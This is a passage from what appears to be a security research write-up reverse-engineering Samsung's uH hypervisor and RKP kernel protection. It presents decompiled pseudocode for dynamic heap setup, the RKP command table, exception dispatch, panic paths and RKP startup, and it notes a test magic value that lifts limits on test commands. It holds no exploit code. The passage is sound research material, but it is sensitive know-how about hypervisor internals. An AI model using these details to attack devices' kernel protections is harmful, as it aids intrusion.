The other two APP_INIT commands are used during initialization of the hypervisor framework. They are not called by the kernel but by S-Boot before the kernel is actually loaded and executed.

In dtb_update, S-Boot will call command #2 for each memory node in the Device Tree Blob (DTB). The arguments of this call are the memory region address and its size. It will then call the command #4 with two pointers to local variables that will be filled by the hypervisor as arguments.

int64_t dtb_update(...) {
  // ...
  dtb_find_entries(dtb, "memory", j_uh_add_dynamic_region);
  sprintf(path, "/reserved-memory");
  offset = dtb_get_path_offset(dtb, path);
  if (offset < 0) {
    dprintf("%s: fail to get path [%s]: %d\n", "dtb_update_reserved_memory", path, offset);
  } else {
    heap_base = 0;
    heap_size = 0;
    dtb_add_reserved_memory(dtb, offset, 0x87000000, 0x200000, "el2_code", "el2,uh");
    uh_call(0xC300C000, 4, &heap_base, &heap_size, 0, 0);
    dtb_add_reserved_memory(dtb, offset, heap_base, heap_size, "el2_earlymem", "el2,uh");
    dtb_add_reserved_memory(dtb, offset, 0x80001000, 0x1000, "kaslr", "kernel-kaslr");
    if (get_env_var(FORCE_UPLOAD) == 5)
      rmem_size = 0x2400000;
    else
      rmem_size = 0x1700000;
    dtb_add_reserved_memory(dtb, offset, 0xC9000000, rmem_size, "sboot", "sboot,rmem");
  }
  // ...
}

int64_t uh_add_dynamic_region(int64_t addr, int64_t size) {
  uh_call(0xC300C000, 2, addr, size, 0, 0);
  return 0;
}

void uh_call(...) {
  asm("hvc #0");
}

The command handler #2, which we named init_cmd_add_dynamic_region, is used to add a range of DDR memory to the dynamic_regions memlist, out of which will be carved the "dynamic heap" region of uH. S-Boot indicates to the hypervisor which physical memory regions it can access once DDR has been initialized.

int64_t init_cmd_add_dynamic_region(saved_regs_t* regs) {
  // ...

  // Ensure the dynamic heap allocator hasn't already been initialized.
  if (uh_state.dynamic_heap_inited || !regs->x2 || !regs->x3) {
    return -1;
  }
  // Add the given memory range to the dynamic regions memlist.
  return memlist_add(&uh_state.dynamic_regions, regs->x2, regs->x3);
}

The command handler #4, which we named init_cmd_initialize_dynamic_heap, is used to finalize the list of dynamic memory regions and initialize the dynamic heap allocator from it. S-Boot calls it once all DDR memory has been added using the previous command. This function verifies its arguments, sets the starting physical address of the kernel to the very lowest DDR memory address, and finally calls initialize_dynamic_heap.

int64_t init_cmd_initialize_dynamic_heap(saved_regs_t* regs) {
  // ...

  // Ensure the dynamic heap allocator hasn't already been initialized.
  if (uh_state.dynamic_heap_inited || !regs->x2 || !regs->x3) {
    return -1;
  }
  // Set the start of kernel physical memory to the lowest DDR address.
  PHYS_OFFSET = memlist_get_min_addr(&uh_state.dynamic_regions);
  // Ensure the S-Boot pointers are not in hypervisor memory.
  base = check_and_convert_kernel_input(regs->x2);
  size = check_and_convert_kernel_input(regs->x3);
  if (!base || !size) {
    uh_log('L', "main.c", 188, "Wrong addr in dynamicheap : base: %p, size: %p", base, size);
    return -1;
  }
  // Initialize the dynamic heap allocator.
  return initialize_dynamic_heap(base, size, regs->x4);
}

initialize_dynamic_heap will first compute the dynamic heap base address and size. If those values are provided by S-Boot, they are used directly. If the size is not provided, it is calculated automatically. If the base address is not provided, a DDR memory region of the right size is carved automatically. The function then calls dynamic_heap_initialize, which saves the chosen range into global variables and initializes the list of heap chunks, similarly to the static heap allocator. It initializes three sparsemaps, physmap, ro_bitmap, and dbl_bitmap, that we will be detailing later. Finally, it initializes the robuf_regions memlist, the robuf sparsemap, and allocates a buffer to contain read-only pages to be used by the kernel.

int64_t initialize_dynamic_heap(uint64_t* base, uint64_t* size, uint64_t flag) {
  // Ensure the dynamic heap allocator hasn't already been initialized.
  if (uh_state.dynamic_heap_inited) {
    return -1;
  }
  // And mark it as initialized.
  uh_state.dynamic_heap_inited = 1;
  // The dynamic heap size can be provided by S-Boot, or calculated automatically.
  if (flag) {
    dynamic_heap_size = *size;
  } else {
    dynamic_heap_size = get_dynamic_heap_size();
  }
  // The dynamic heap base can be provided by S-Boot. In that case, the range provided is removed from the
  // `dynamic_regions` memlist. Otherwise, a range of the requested size is automatically removed from the
  // `dynamic_regions` memlist and is returned.
  if (*base) {
    dynamic_heap_base = *base;
    if (memlist_remove(&uh_state.dynamic_regions, dynamic_heap_base, dynamic_heap_size)) {
      uh_log('L', "main.c", 281, "[-] Dynamic heap address is not existed in memlist, base : %p", dynamic_heap_base);
      return -1;
    }
  } else {
    dynamic_heap_base = memlist_get_region_of_size(&uh_state.dynamic_regions, dynamic_heap_size, 0x200000);
  }
  // Actually initialize the dynamic heap allocator using the provided or computed base address and size.
  dynamic_heap_initialize(dynamic_heap_base, dynamic_heap_size);
  uh_log('L', "main.c", 288, "[+] Dynamic heap initialized base: %lx, size: %lx", dynamic_heap_base, dynamic_heap_size);
  // Copy the dynamic heap base address and size back to S-Boot.
  *base = dynamic_heap_base;
  *size = dynamic_heap_size;
  // Map the dynamic heap in the second stage at EL1 as writable.
  mapped_start = dynamic_heap_base;
  if (s2_map(dynamic_heap_base, dynamic_heap_size_0, UNKN1 | WRITE | READ, &mapped_start) < 0) {
    uh_log('L', "main.c", 299, "s2_map returned false, start : %p, size : %p", mapped_start, dynamic_heap_size);
    return -1;
  }
  // Create 3 new sparsemaps: `physmap`, `ro_bitmap` and `dbl_bitmap` mapping all the remaining DDR memory. The physmap
  // internal entries are also added to the protected ranges as they are critical to the hypervisor security.
  sparsemap_init("physmap", &uh_state.phys_map, &uh_state.dynamic_regions, 0x20, 0);
  sparsemap_for_all_entries(&uh_state.phys_map, protected_ranges_add);
  sparsemap_init("ro_bitmap", &uh_state.ro_bitmap, &uh_state.dynamic_regions, 1, 0);
  sparsemap_init("dbl_bitmap", &uh_state.dbl_bitmap, &uh_state.dynamic_regions, 1, 0);
  // Create a new memlist that will be used to allocate memory pages for page tables management. This memlist is
  // initialized with all the remaining DDR memory.
  memlist_init(&uh_state.page_allocator.list);
  memlist_add(&uh_state.page_allocator.list, dynamic_heap_base, dynamic_heap_size);
  // Create a new sparsemap mapping all the pages from the previous memlist.
  sparsemap_init("robuf", &uh_state.page_allocator.map, &uh_state.page_allocator.list, 1, 0);
  // Allocates a chunk of memory for the robuf allocator (RO pages for the kernel).
  allocate_robuf();
  // Unmap all the unused DDR memory that might remain below 0xa00000000.
  regions_end_addr = memlist_get_max_addr(&uh_state.dynamic_regions);
  if ((regions_end_addr >> 33) <= 4) {
    s2_unmap(regions_end_addr, 0xa00000000 - regions_end_addr);
    s1_unmap(regions_end_addr, 0xa00000000 - regions_end_addr);
  }
  return 0;
}

If the size is not provided by S-Boot, get_dynamic_heap_size is called. It first calculates and sets the robuf size: 1 MB per GB of DDR memory, plus 6 MB. Then it calculates and returns the dynamic heap size: 4 MB per GB of DDR memory, plus 6 MB, rounded up to 8 MB.

uint64_t get_dynamic_heap_size() {
  // ...

  // Do some housekeeping on the memlist.
  memlist_merge_ranges(&uh_state.dynamic_regions);
  memlist_dump(&uh_state.dynamic_regions);
  // Calculate a first dynamic size, depending on the amount of DDR memory, to be added to a fixed robuf size.
  some_size1 = memlist_get_contiguous_gigabytes(&uh_state.dynamic_regions, 0x100000);
  set_robuf_size(some_size1 + 0x600000);
  // Calculate a second and third dynamic sizes, to be added to the robuf size, to get the dynamic heap size.
  some_size2 = memlist_get_contiguous_gigabytes(&uh_state.dynamic_regions, 0x100000);
  some_size3 = memlist_get_contiguous_gigabytes(&uh_state.dynamic_regions, 0x200000);
  dynamic_heap_size = some_size1 + 0x600000 + some_size2 + some_size3;
  // Ceil the dynamic heap size to 0x200000 bytes.
  return (dynamic_heap_size + 0x1fffff) & 0xffe00000;
}

allocate_robuf tries to allocate a region of robuf_size from the dynamic heap allocator that was initialized moments ago. If that is not possible, it grabs the last contiguous chunk of memory available in the allocator. It then calls page_allocator_init with this memory region as an argument. page_allocator_init initializes the sparsemap and everything that the page allocator will use. The page allocator and the "robuf" region are what will be used by RKP for handing out read-only pages to the kernel (for the data protection feature, for example).

int64_t allocate_robuf() {
  // ...

  // Ensure the dynamic heap allocator has been initialized.
  if (!uh_state.dynamic_heap_inited) {
    uh_log('L', "page_allocator.c", 84, "Dynamic heap needs to be initialized");
    return -1;
  }
  // Ceil the robuf size to the size of a page.
  robuf_size = uh_state.page_allocator.robuf_size & 0xfffff000;
  // Allocate the robuf from the dynamic heap allocator.
  robuf_base = dynamic_heap_alloc(uh_state.page_allocator.robuf_size & 0xfffff000, 0x1000);
  // If the allocation failed, use the last memory chunk from the dynamic heap allocator.
  if (!robuf_base) {
    dynamic_heap_alloc_last_chunk(&robuf_base, &robuf_size);
  }
  if (!robuf_base) {
    uh_log('L', "page_allocator.c", 96, "Robuffer Alloc Fail");
    return -1;
  }
  // Clear the data cache for all robuf addresses.
  if (robuf_size) {
    offset = 0;
    do {
      zero_data_cache_page(robuf_base + offset);
      offset += 0x1000;
    } while (offset < robuf_size);
  }
  // Finally, initialize the page allocator using the robuf memory region.
  return page_allocator_init(&uh_state.page_allocator, robuf_base, robuf_size);
}

APP_RKP

The command handlers registered for APP_RKP are:

Command ID Command Handler Maximum Calls
0x00 rkp_cmd_init 0
0x01 rkp_cmd_start 1
0x02 rkp_cmd_deferred_start 1
0x03 rkp_cmd_write_pgt1 -
0x04 rkp_cmd_write_pgt2 -
0x05 rkp_cmd_write_pgt3 -
0x06 rkp_cmd_emult_ttbr0 -
0x07 rkp_cmd_emult_ttbr1 -
0x08 rkp_cmd_emult_doresume -
0x09 rkp_cmd_free_pgd -
0x0A rkp_cmd_new_pgd -
0x0B rkp_cmd_kaslr_mem 0
0x0D rkp_cmd_jopp_init 1
0x0E rkp_cmd_ropp_init 1
0x0F rkp_cmd_ropp_save 0
0x10 rkp_cmd_ropp_reload -
0x11 rkp_cmd_rkp_robuffer_alloc -
0x12 rkp_cmd_rkp_robuffer_free -
0x13 rkp_cmd_get_ro_bitmap 1
0x14 rkp_cmd_get_dbl_bitmap 1
0x15 rkp_cmd_get_rkp_get_buffer_bitmap 1
0x17 rkp_cmd_id_0x17 -
0x18 rkp_cmd_set_sctlr_el1 -
0x19 rkp_cmd_set_tcr_el1 -
0x1A rkp_cmd_set_contextidr_el1 -
0x1B rkp_cmd_id_0x1B -
0x20 rkp_cmd_dynamic_load -
0x40 rkp_cmd_cred_init 1
0x41 rkp_cmd_assign_ns_size 1
0x42 rkp_cmd_assign_cred_size 1
0x43 rkp_cmd_pgd_assign -
0x44 rkp_cmd_cred_set_fp -
0x45 rkp_cmd_cred_set_security -
0x46 rkp_cmd_assign_creds -
0x48 rkp_cmd_ro_free_pages -
0x4A rkp_cmd_prot_dble_map -
0x4B rkp_cmd_mark_ppt -
0x4E rkp_cmd_set_pages_ro_tsec_jar -
0x4F rkp_cmd_set_pages_ro_vfsmnt_jar -
0x50 rkp_cmd_set_pages_ro_cred_jar -
0x51 rkp_cmd_id_0x51 1
0x52 rkp_cmd_init_ns -
0x53 rkp_cmd_ns_set_root_sb -
0x54 rkp_cmd_ns_set_flags -
0x55 rkp_cmd_ns_set_data -
0x56 rkp_cmd_ns_set_sys_vfsmnt 5
0x57 rkp_cmd_id_0x57 -
0x60 rkp_cmd_selinux_initialized -
0x81 rkp_cmd_test_get_par 0
0x82 rkp_cmd_test_get_wxn 0
0x83 rkp_cmd_test_ro_range 0
0x84 rkp_cmd_test_get_va_xn 0
0x85 rkp_check_vmm_unmapped 0
0x86 rkp_cmd_test_ro 0
0x87 rkp_cmd_id_0x87 0
0x88 rkp_cmd_check_splintering_point 0
0x89 rkp_cmd_id_0x89 0

Let's take a look at command handler #0 called in uh_init. It simply initializes the maximal number of times that each command can be called (enforced by the "checker" function) by calling the rkp_init_cmd_counts function.

int64_t rkp_cmd_init() {
  // Enable panic when a violation is detected.
  rkp_panic_on_violation = 1;
  // Initialize the counters of commands executions.
  rkp_init_cmd_counts();
  cs_init(&rkp_start_lock);
  return 0;
}

Exception Handling

An important part of a hypervisor is its exception handling code. These functions are called on various events: faulting memory accesses by the kernel, when the kernel executes an HVC instruction, etc. They can be found by looking at the vector table specified in the VBAR_EL2 register. We have seen in vmm_init that the vector table is at vmm_vector_table. From the ARMv8 specifications, we know it has the following structure:

Address Exception Type Description
+0x000 Synchronous Current EL with SP0
+0x080 IRQ/vIRQ
+0x100 FIQ/vFIQ
+0x180 SError/vSError
+0x200 Synchronous Current EL with SPx
+0x280 IRQ/vIRQ
+0x300 FIQ/vFIQ
+0x380 SError/vSError
+0x400 Synchronous Lower EL using AArch64
+0x480 IRQ/vIRQ
+0x500 FIQ/vFIQ
+0x580 SError/vSError
+0x600 Synchronous Lower EL using AArch32
+0x680 IRQ/vIRQ
+0x700 FIQ/vFIQ
+0x780 SError/vSError

Our device has a 64-bit kernel executing at EL1, so the hypervisor calls should be dispatched to the exception handler at vmm_vector_table+0x400. But in the hypervisor, all the exception handlers end up calling the vmm_dispatch function with different arguments.

void exception_handler(...) {
  // ...

  // Save registers x0 to x30, sp_el1, elr_el2, spsr_el2.
  // ...
  // Dispatch the exception to the VMM, passing it the exception level and type.
  vmm_dispatch(<exc_level>, <exc_type>, &regs);
  // Clear the local monitor and return to the caller.
  asm("clrex");
  asm("eret");
}

The level and type of the exception that has been taken are passed to vmm_dispatch as arguments. For synchronous exceptions, it will call vmm_synchronous_handler and panic if it returns a non-zero value. For all other exception types, it simply logs a message.

int64_t vmm_dispatch(int64_t level, int64_t type, saved_regs_t* regs) {
  // ...

  // If another core has called `vmm_panic`, panic on this core too.
  if (has_panicked) {
    vmm_panic(level, type, regs, "panic on another core");
  }
  // Handle the exception depending on its type.
  switch (type) {
    case 0x0: /* Synchronous */
      // For synchronous exception, call the appropriate handler and panic if handling failed.
      if (vmm_synchronous_handler(level, type, regs)) {
        vmm_panic(level, type, regs, "syncronous handler failed");
      }
      break;
    case 0x80: /* IRQ/vIRQ */
      uh_log('D', "vmm.c", 1132, "RKP_e3b85960");
      break;
    case 0x100: /* FIQ/vFIQ */
      uh_log('D', "vmm.c", 1135, "RKP_6d732e0a");
      break;
    case 0x180: /* SError/vSError */
      uh_log('D', "vmm.c", 1149, "RKP_3c71de0a");
      break;
    default:
      return 0;
  }
  return 0;
}

vmm_synchronous_handler first gets the exception class by reading the ESR_EL2 register:

  • for HVC instruction executions, it calls uh_handle_command to dispatch it to the appropriate application command handler;
  • for trapped system register accesses, it lets other_msr_mrs_system decide whether the write is allowed or not, and then resumes execution or panics depending on the function's return value;
  • for instruction aborts from the kernel, specific aborts or aborts with a zero faulting address are skipped, otherwise, all other aborts result in a panic;
  • for data aborts from the kernel, it first checks if this is a write to a kernel page table, and if that's the case, it calls the rkp_lxpgt_write function corresponding to the target page table level. For translation faults at level 3, the fault is ignored if the address can be successfully translated (using AT S12E1R or AT S12E1W). For permission faults, the fault is ignored, and the TLBs are flushed if the address can be successfully translated (using AT S12E1W). Aborts with a zero faulting address are skipped, and all other aborts result in a panic.
int64_t vmm_synchronous_handler(int64_t level, int64_t type, saved_regs_t* regs) {
  // ...

  // ESR_EL2, Exception Syndrome Register (EL2).
  //
  // EC, bits [31:26]: Indicates the reason for the exception that this register holds information about.
  esr_el2 = get_esr_el2();
  switch (esr_el2 >> 26) {
    case 0x12: /* HVC instruction execution in AArch32 state */
    case 0x16: /* HVC instruction execution in AArch64 state */
      // For HVC instruction execution, check if the HVC ID starts with 0xc300cXXX.
      if ((regs->x0 & 0xfffff000) == 0xc300c000) {
        app_id = regs->x0;
        cmd_id = regs->x1;
        // Reset the injection value for the current CPU.
        cpu_num = get_current_cpu();
        if (cpu_num <= 7) {
          uh_state.injections[cpu_num] = 0;
        }
        // Dispatch the call to the application command handler.
        uh_handle_command(app_id, cmd_id, regs);
      }
      return 0;
    case 0x18: /* Trapped MSR, MRS or Sys. ins. execution in AArch64 state */
      // For trapped system register accesses, first ensure that it is a write. If that's the case, call a handler to
      // decide whether the operation is allowed or not.
      //
      // The handler gets the value that was being written to the system register from the saved general registers.
      // Depending on which system register is being written, it will check if specific bits have a fixed value. If the
      // write operation is allowed, ELR_EL2 is updated to make it point to the next instruction. If the operation is
      // denied, the hypervisor will panic.
      //
      //   - Direction, bit [0] = 0: Write access, including MSR instructions.
      //   - Op0/Op2/Op1/CRn/Rt/CRm, bits[21:1]: Values from the issued instruction.
      if ((esr_el2 & 1) == 0 && !other_msr_mrs_system(&regs->x0, esr_el2_1 & 0x1ffffff)) {
        return 0;
      }
      vmm_panic(level, type, regs, "other_msr_mrs_system failure");
      return 0;
    case 0x20: /* Instruction Abort from a lower EL */
      // ...
      // For instruction aborts coming from a lower EL, if the bits patterns below all match and the number of
      // instruction aborts skipped is less than 9, then the number is incremented and the abort is skipped.
      //
      //   - IFSC, bits [5:0] = 0b000111: Translation fault, level 3.
      //   - S1PTW, bit [7] = 0b1: Fault on the stage 2 translation of an access for a stage 1 translation table walk.
      //   - EA, bit [9] = 0b0: Not an External Abort.
      //   - FnV, bit [10] = 0b0: FAR is valid.
      //   - SET, bits [12:11] = 0b00: Recoverable state (UER).
      if (should_skip_prefetch_abort() == 1) {
        return 0;
      }
      // If the faulting address is 0, the fault is injected back to be handled by EL1 and the injection value is set
      // for the current CPU. Otherwise, the hypervisor panics.
      if (!esr_ec_prefetch_abort_from_a_lower_exception_level("-snip-")) {
        print_vmm_registers(regs);
        return 0;
      }
      vmm_panic(level, type, regs, "esr_ec_prefetch_abort_from_a_lower_exception_level");
      return 0;
    case 0x21: /* Instruction Abort taken without a change in EL */
      // For instruction aborts taken without a change in EL, meaning hypervisor faults, it panics.
      uh_log('L', "vmm.c", 920, "esr abort iss: 0x%x", esr_el2 & 0x1ffffff);
      vmm_panic(level, type, regs, "esr_ec_prefetch_abort_taken_without_a_change_in_exception_level");
    case 0x24: /* Data Abort from a lower EL */
      // For data aborts coming from a lower EL, it first calls `rkp_fault` to try to detect page table writes. That is
      // when the faulting instruction is in the kernel text and is a `str x2, [x1]`. In addition, the x1 register must
      // point to a page table entry. Then, depending on the page table level, it calls a different function:
      //
      //   - rkp_l1pgt_write for level 1 PTs.
      //   - rkp_l2pgt_write for level 2 PTs.
      //   - rkp_l3pgt_write for level 3 PTs.
      //
      // If the kernel page table write is allowed, the PC is advanced to the next instruction.
      if (!rkp_fault(regs)) {
        return 0;
      }
      // For translation faults at level 3, convert the faulting IPA into a kernel VA. Then call the `el1_va_to_pa`
      // function that will use the AT S12E1R/W instruction to translate it to a PA, as if the access was coming from
      // EL1. If the address can be translated successfully, we return immediately.
      //
      // DFSC, bits [5:0] = 0b000111: Translation fault, level 3.
      if ((esr_el2 & 0x3f) == 0b000111) {
        // HPFAR_EL2, Hypervisor IPA Fault Address Register.
        //
        // Holds the faulting IPA for some aborts on a stage 2 translation taken to EL2.
        va = rkp_get_va(get_hpfar_el2() << 8);
        cs_enter(&s2_lock);
        // el1_va_to_pa returns 0 if the address can be translated.
        res = el1_va_to_pa(va, &ipa);
        if (!res) {
          uh_log('L', "vmm.c", 994, "Skipped data abort va: %p, ipa: %p", va, ipa);
          cs_exit(&s2_lock);
          return 0;
        }
        cs_exit(&s2_lock);
      }
      // For permission faults at any level, convert the faulting IPA into a kernel VA. Then use the AT S12E1W
      // instruction to translate it to a PA, as if the access was coming from EL1. If the address can be translated
      // successfully, invalidate the TLBs and return immediately.
      //
      //   - WnR, bit [6] = 0b1: Abort caused by an instruction writing to a memory location.
      //   - DFSC, bits [5:0] = 0b0011xx: Permission fault, any level.
      if ((esr_el2 & 0x7c) == 0x4c) {
        va = rkp_get_va(get_hpfar_el2() << 8);
        at_s12e1w(va);
        // PAR_EL1, Physical Address Register.
        //
        // F, bit [0] = 0: Successful address translation.
        if ((get_par_el1() & 1) == 0) {
          print_el2_state();
          invalidate_entire_s1_s2_el1_tlb();
          return 0;
        }
      }
      // ...
      // For all other aborts, call the same function as the other instruction aborts.
      if (esr_ec_prefetch_abort_from_a_lower_exception_level("-snip-")) {
        vmm_panic(level, type, regs, "esr_ec_data_abort_from_a_lower_exception_level");
      } else {
        print_vmm_registers(regs);
      }
      return 0;
    case 0x25: /* Data Abort taken without a change in EL */
      // For data aborts taken without a change in EL, meaning hypervisor faults, it panics.
      vmm_panic(level, type, regs, "esr_ec_data_abort_taken_without_a_change_in_exception_level");
      return 0;
    default:
      return -1;
  }
}

The vmm_panic function, called when the hypervisor needs to panic, first logs the panic message, exception level, and type. If the MMU is disabled or the exception is not synchronous or taken from EL2, it then calls uh_panic. Otherwise, it calls uh_panic_el1.

crit_sec_t* vmm_panic(int64_t level, int64_t type, saved_regs_t* regs, char* message) {
  // ...

  uh_log('L', "vmm.c", 1171, ">>vmm_panic<<");
  cs_enter(&panic_cs);
  // Print the panic message.
  uh_log('L', "vmm.c", 1175, "message: %s", message);
  // Print the exception level.
  switch (level) {
    case 0x0:
      uh_log('L', "vmm.c", 1179, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_CURRENT_WITH_SP_EL0");
      break;
    case 0x200:
      uh_log('L', "vmm.c", 1182, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_CURRENT_WITH_SP_ELX");
      break;
    case 0x400:
      uh_log('L', "vmm.c", 1185, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_LOWER_USING_AARCH64");
      break;
    case 0x600:
      uh_log('L', "vmm.c", 1188, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_LOWER_USING_AARCH32");
      break;
    default:
      uh_log('L', "vmm.c", 1191, "level: VMM_UNKNOWN\n");
      break;
  }
  // Print the exception type.
  switch (type) {
    case 0x0:
      uh_log('L', "vmm.c", 1197, "type: VMM_EXCEPTION_TYPE_SYNCHRONOUS");
      break;
    case 0x80:
      uh_log('L', "vmm.c", 1200, "type: VMM_EXCEPTION_TYPE_IRQ_OR_VIRQ");
      break;
    case 0x100:
      uh_log('L', "vmm.c", 1203, "type: VMM_SYSCALL\n");
      break;
    case 0x180:
      uh_log('L', "vmm.c", 1206, "type: VMM_EXCEPTION_TYPE_SERROR_OR_VSERROR");
      break;
    default:
      uh_log('L', "vmm.c", 1209, "type: VMM_UNKNOWN\n");
      break;
  }
  print_vmm_registers(regs);
  // SCTLR_EL1, System Control Register (EL1).
  //
  // M, bit [0] = 0b0: EL1&0 stage 1 address translation disabled.
  if ((get_sctlr_el1() & 1) == 0 || type != 0 /* Synchronous */ ||
      (level == 0 /* Current EL with SP0 */ || level == 0x200 /* Current EL with SP0 */)) {
    has_panicked = 1;
    cs_exit(&panic_cs);
    // Reset the device immediately if the panic originated from another core.
    if (!strcmp(message, "panic on another core")) {
      exynos_reset(0x8800);
    }
    // Call `uh_panic` which will ultimately reset the device.
    uh_panic();
  }
  // Call `uh_panic_el1` which will execute the registered kernel fault handler.
  uh_panic_el1(uh_state.fault_handler, regs);
  return cs_exit(&panic_cs);
}

uh_panic calls print_state_and_reset which logs the EL1 and EL2 system register values, and the hypervisor and kernel stack contents. It copies a textual version of those into the "bigdata" region, and then reboots the device.

void uh_panic() {
  uh_log('L', "main.c", 482, "uh panic!");
  print_state_and_reset();
}

uh_panic_el1 fills the uh_handler_data structure, which we have seen previously, with the system and general register values. It then sets ELR_EL2 to the kernel fault handler so that it will be called upon executing the ERET instruction.

int64_t uh_panic_el1(uh_handler_list_t* fault_handler, saved_regs_t* regs) {
  // ...

  // Ensure that a kernel fault handler is registered.
  uh_log('L', "vmm.c", 111, ">>uh_panic_el1<<");
  if (!fault_handler) {
    uh_log('L', "vmm.c", 113, "uH handler did not registered");
    uh_panic();
  }
  // Print EL2 system registers values.
  print_el2_state();
  // Print EL1 system registers values.
  print_el1_state();
  // Print the content of the hypervisor and kernel stacks.
  print_stack_contents();
  // Set the injection value for the current CPU, unless it has already been set, in which case it panics.
  cpu_num = get_current_cpu();
  if (cpu_num <= 7) {
    something = cpu_num - 0x21530000;
    if (uh_state.injections[cpu_num] == something) {
      uh_log('D', "vmm.c", 99, "Injection locked");
    }
    uh_state.injections[cpu_num] = something;
  }
  // Fill the `uh_handler_data` structure with the registers values.
  handler_data = &fault_handler->uh_handler_data[cpu_num];
  handler_data->esr_el2 = get_esr_el2();
  handler_data->elr_el2 = get_elr_el2();
  handler_data->hcr_el2 = get_hcr_el2();
  handler_data->far_el2 = get_far_el2();
  handler_data->hpfar_el2 = get_hpfar_el2() << 8;
  if (regs) {
    memcpy(fault_handler->uh_handler_data[cpu_num].regs.regs, regs, 272);
  }
  // Finally, set ELR_EL2 to the kernel fault handler to execute it on exception return.
  set_elr_el2(fault_handler->uh_handler);
  return 0;
}

Digging Into RKP

Now that we have seen how the hypervisor is initialized and how exceptions are handled, let's see how the RKP-specific parts are started.

Startup

RKP startup is performed in two stages using two different commands:

  • command #1 (start): called by the kernel in start_kernel, right after mm_init;
  • command #2 (deferred start): called by the kernel in kernel_init, right before starting init.

RKP Start

On the kernel side, the first startup-related command is called in rkp_init.

static void __init rkp_init(void)
{
    // ...
    rkp_init_data.vmalloc_end = (u64)high_memory;
    rkp_init_data.init_mm_pgd = (u64)__pa(swapper_pg_dir);
    rkp_init_data.id_map_pgd = (u64)__pa(idmap_pg_dir);
    rkp_init_data.tramp_pgd = (u64)__pa(tramp_pg_dir);
#ifdef CONFIG_UH_RKP_FIMC_CHECK
    rkp_init_data.no_fimc_verify = 1;
#endif
    rkp_init_data.tramp_valias = (u64)TRAMP_VALIAS;
    rkp_init_data.zero_pg_addr = (u64)__pa(empty_zero_page);
    // ...
    uh_call(UH_APP_RKP, RKP_START, (u64)&rkp_init_data, (u64)kimage_voffset, 0, 0);
}

This function fills a data structure of type rkp_init_t that is given to the hypervisor. It contains information about the kernel memory layout.

rkp_init_t rkp_init_data __rkp_ro = {
    .magic = RKP_INIT_MAGIC,
    .vmalloc_start = VMALLOC_START,
    .no_fimc_verify = 0,
    .fimc_phys_addr = 0,
    ._text = (u64)_text,
    ._etext = (u64)_etext,
    ._srodata = (u64)__start_rodata,
    ._erodata = (u64)__end_rodata,
     .large_memory = 0,
};

The rkp_init function is called in start_kernel, early in the kernel boot process.

asmlinkage __visible void __init start_kernel(void)
{
    // ...
    rkp_init();
    // ...
}

On the hypervisor side, the command handler simply ensures that it can't be called twice, and calls rkp_start after taking the appropriate lock.

int64_t rkp_cmd_start(saved_regs_t* regs) {
  // ...

  cs_enter(&rkp_start_lock);
  // Make sure RKP is not already started.
  if (rkp_inited) {
    cs_exit(&rkp_start_lock);
    uh_log('L', "rkp.c", 133, "RKP is already started");
    return -1;
  }
  // Call the actual startup function.
  res = rkp_start(regs);
  cs_exit(&rkp_start_lock);
  return res;
}

The rkp_start function saves all the information about the kernel memory layout into global variables. It initializes two memlists, executable_regions which contains all the kernel executable regions (including the kernel text), and dynamic_load_regions which is used for the "dynamic executable loading" feature that won't be detailed in this blog post. It also protects the kernel sections by calling the rkp_paging_init function and processes the user page tables by calling rkp_l1pgt_process_table.

int64_t rkp_start(saved_regs_t* regs) {
  // ...

  // Save the offset between the kernel virtual and physical mappings into `KIMAGE_VOFFSET`.
  KIMAGE_VOFFSET = regs->x3;
  // Convert the address of the `rkp_init_data` structure from a VA to a PA using `rkp_get_pa`.
  rkp_init_data = rkp_get_pa(regs->x2);
  // Check the magic value.
  if (rkp_init_data->magic - 0x5afe0001 >= 2) {
    uh_log('L', "rkp_init.c", 85, "RKP INIT-Bad Magic(%d), %p", regs->x2, rkp_init_data);
    return -1;
  }
  // If it is the test magic value, call `rkp_init_cmd_counts_test` which allows test commands 0x81-0x88 to be called an
  // unlimited number of times.
  if (rkp_init_data->magic == 0x5afe0002) {
    rkp_init_cmd_counts_test();
    rkp_test = 1;
  }
  // Saves the various fields of `rkp_init_data` into global variables.
  INIT_MM_PGD = rkp_init_data->init_mm_pgd;
  ID_MAP_PGD = rkp_init_data->id_map_pgd;
  ZERO_PG_ADDR = rkp_init_data->zero_pg_addr;
  TRAMP_PGD = rkp_init_data->tramp_pgd;
  TRAMP_VALIAS = rkp_init_data->tramp_valias;
  VMALLOC_START = rkp_init_data->vmalloc_start;
  VMALLOC_END = rkp_init_data->vmalloc_end;
  TEXT = rkp_init_data->_text;
  ETEXT = rkp_init_data->_etext;
  TEXT_PA = rkp_get_pa(TEXT);
  ETEXT_PA = rkp_get_pa(ETEXT);
  SRODATA = rkp_init_data->_srodata;
  ERODATA = rkp_init_data->_erodata;
  TRAMP_PGD_PAGE = TRAMP_PGD & 0xfffffffff000;
  INIT_MM_PGD_PAGE = INIT_MM_PGD & 0xfffffffff000;
  LARGE_MEMORY = rkp_init_data->large_memory;
  page_ro = 0;
  page_free = 0;
  s2_breakdown = 0;
  pmd_allocated_by_rkp = 0;
  NO_FIMC_VERIFY = rkp_init_data->no_fimc_verify;
  if (rkp_bitmap_init() < 0) {
    uh_log('L', "rkp_init.c", 150, "Failed to init bitmap");
    return -1;
  }
  // Create a new memlist to contain the list of kernel executable regions.
  memlist_init(&executable_regions);
  memlist_set_unkn_14(&executable_regions);
  // Add the kernel text to the newly created memlist.
  memlist_add(&executable_regions, TEXT, ETEXT - TEXT);
  // Add the `TRAMP_VALIAS` page to the newly created memlist.
  if (TRAMP_VALIAS) {
    memlist_add(&executable_regions, TRAMP_VALIAS, 0x1000);
  }
  // Create a new memlist of dynamically loaded executable regions.
  memlist_init(&dynamic_load_regions);
  memlist_set_unkn_14(&dynamic_load_regions);
  // Call a function that makes the static heap acquire all the unused dynamic memory.
  put_all_dynamic_heap_chunks_in_static_heap();
  // Map and protect various kernel regions in the second stage at EL1, and at EL2.
  if (rkp_paging_init() < 0) {
    uh_log('L', "rkp_init.c", 169, "rkp_pging_init fails");
    return -1;
  }
  // Mark RKP as initialized.
  rkp_inited = 1;
  // Call a function that will process the user page tables.
  if (rkp_l1pgt_process_table(get_ttbr0_el1() & 0xfffffffff000, 0, 1) < 0) {
    uh_log('L', "rkp_init.c", 179, "processing l1pgt fails");
    return -1;
  }
  // Log EL2 system registers values.
